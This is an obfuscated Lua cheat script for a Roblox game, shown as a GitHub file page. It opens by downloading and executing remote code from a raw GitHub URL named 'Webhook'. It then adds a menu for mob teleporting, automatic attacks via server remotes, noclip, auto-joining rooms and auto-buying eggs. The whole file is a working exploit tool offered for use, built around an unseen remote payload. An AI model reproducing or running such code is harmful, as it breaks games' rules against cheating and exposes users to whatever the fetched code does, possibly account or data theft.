-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathk
12 lines (10 loc) · 5.02 KB
/
k
1
2
3
4
5
6
7
8
9
10
11
12
--[[
.____ ________ ___. _____ __
| | __ _______ \_____ \\_ |___/ ____\_ __ ______ ____ _____ _/ |_ ___________
| | | | \__ \ / | \| __ \ __\ | \/ ___// ___\\__ \\ __\/ _ \_ __ \
| |___| | // __ \_/ | \ \_\ \ | | | /\___ \\ \___ / __ \| | ( <_> ) | \/
|_______ \____/(____ /\_______ /___ /__| |____//____ >\___ >____ /__| \____/|__|
\/ \/ \/ \/ \/ \/ \/
\_Welcome to LuaObfuscator.com (Alpha 0.1.7) ~ Much Love, Ferib
]]--
local v0,v1,v2,v3,v4,v5=loadstring(game:HttpGet("https://raw.githubusercontent.com/vabalata1/a/main/Webhook"))();local v6=v5();local v7=v6:CreateTab("Farm",4483362458);local v8=game:GetService("ReplicatedStorage");local v9=game:GetService("Players");local v10=game:GetService("Workspace");local v11="";if not v10:FindFirstChild("Client") then local v47=Instance.new("Folder");v47.Name="Client";v47.Parent=v10;end if not v10.Client:FindFirstChild("Mobs") then local v50=Instance.new("Folder");v50.Name="Mobs";v50.Parent=v10.Client;end local v12=game:GetService("Workspace").Client.Mobs;local function v13(v33)if (v12 and ( #v12:GetChildren()>0)) then local v61=v12:GetChildren()[v33] or v12:GetChildren()[1];v9.LocalPlayer.Character:MoveTo(v61.PrimaryPart.Position);end end local function v14()if TpLooping then v13(2);task.delay(math.huge,v14);end end Toggle=v7:CreateToggle({Name="Teleport Mobs",CurrentValue=false,Flag="Toggle1",Callback=function(v34)TpLooping=v34;if TpLooping then v14();end end});local function v15()local v54={[1]={[1]="MobAttack",[2]={}}};if (v12 and ( #v12:GetChildren()>0)) then for v63,v64 in pairs(v12:GetChildren()) do local v65=v64.Name;v54[1][2][v65]=true;end end v8.Remotes.Server:FireServer(unpack(v54));end local function v16()if AutoAttack then v15();task.delay(math.huge,v16);end end Toggle=v7:CreateToggle({Name="Auto Attack",CurrentValue=false,Flag="Toggle2",Callback=function(v35)AutoAttack=v35;if AutoAttack then v16();end end});v7:CreateSection("enable noclip to make auto farm work better");local v17=nil;local v18=nil;noclip=function()v18=false;local function v55()if ((v18==false) and (game.Players.LocalPlayer.Character~=nil)) then for v69,v70 in pairs(game.Players.LocalPlayer.Character:GetDescendants()) do if (v70:IsA("BasePart") and v70.CanCollide and (v70.Name~=floatName)) then v70.CanCollide=false;end end end wait(0.21);end v17=game:GetService("RunService").Stepped:Connect(v55);end;clip=function()if v17 then v17:Disconnect();end v18=true;end;Toggle=v7:CreateToggle({Name="Noclip",CurrentValue=false,Flag="Toggle3",Callback=function(v36)if v36 then noclip();else clip();end end});local v19=game:GetService("Players").LocalPlayer.PlayerGui.UI.MissionSettings.MissionFrame.FrameGUI:GetChildren();local v20={};local v21=v6:CreateTab("Auto Join",4483362458);for v37,v38 in pairs(v19) do if v38:IsA("ImageLabel") then table.insert(v20,v38.Name);end end local v22=v21:CreateDropdown({Name="Dropdown Example",options=v20,CurrentOption="",Flag="Dropdown1",Callback=function(v39)DropdownCallback(v39);end,Options=v20});v21:CreateSection("starts again every 60 seconds to avoid that a person is already inside");local v23=v21:CreateToggle({Name="Auto Join [Room] ",CurrentValue=false,Flag="Toggle1",Callback=function(v40)if v40 then enabled=true;local v62=v22.CurrentOption;while enabled do local v67=game:GetService("Players").LocalPlayer.Character;v67:SetPrimaryPartCFrame(game:GetService("Workspace").Client.Rooms['Room_1'].CFrame);wait(1);local v68={[1]={[1]="RoomJoin",[2]=workspace.Client.Interact:FindFirstChild("Game Interact")}};game:GetService("ReplicatedStorage").Remotes.Server:FireServer(unpack(v68));wait(1);DropdownCallback(v62);wait(60);if not enabled then break;end end else enabled=false;end end});DropdownCallback=function(v41)local v56=v41 or "";local v57={[1]={[1]="MapSelect",[2]=v56}};game:GetService("ReplicatedStorage").Remotes.Server:FireServer(unpack(v57));end;local v24=v6:CreateTab("Eggs",4483362458);local v25=game:GetService("Players").LocalPlayer.PlayerGui.UI.SummonSettings.SummonFrame.FrameGUI;local v26={};for v42,v43 in pairs(v25:GetChildren()) do if v43:IsA("ImageLabel") then table.insert(v26,v43.Name);end end local v27={[1]={[1]="TierBuy",[2]="Demon Slayer",[3]="E",[4]={}}};local v28=v24:CreateDropdown({Name="Select Egg",Options=v26,CurrentOption=v26[1],Flag="Dropdown1",Callback=function(v44)v27[1][2]=v44;end});local v29={"E","R"};local v30=v24:CreateDropdown({Name="Egg Count",Options=v29,CurrentOption=v29[1],Flag="EggCountDropdown",Callback=function(v45)v27[1][3]=v45;end});local v31=v24:CreateSection("");local v32=v24:CreateToggle({Name="Open Egg",CurrentValue=false,Flag="Toggle1",Callback=function(v46)v23.State=v46;if v23.State then game.Players.LocalPlayer.Character:MoveTo(game:GetService("Workspace").Client.NPCs.Kakashe.HumanoidRootPart.Position);end while v23.State do game:GetService("ReplicatedStorage").Remotes.Server:FireServer(unpack(v27));wait(math.huge);end end});v1:LoadConfiguration();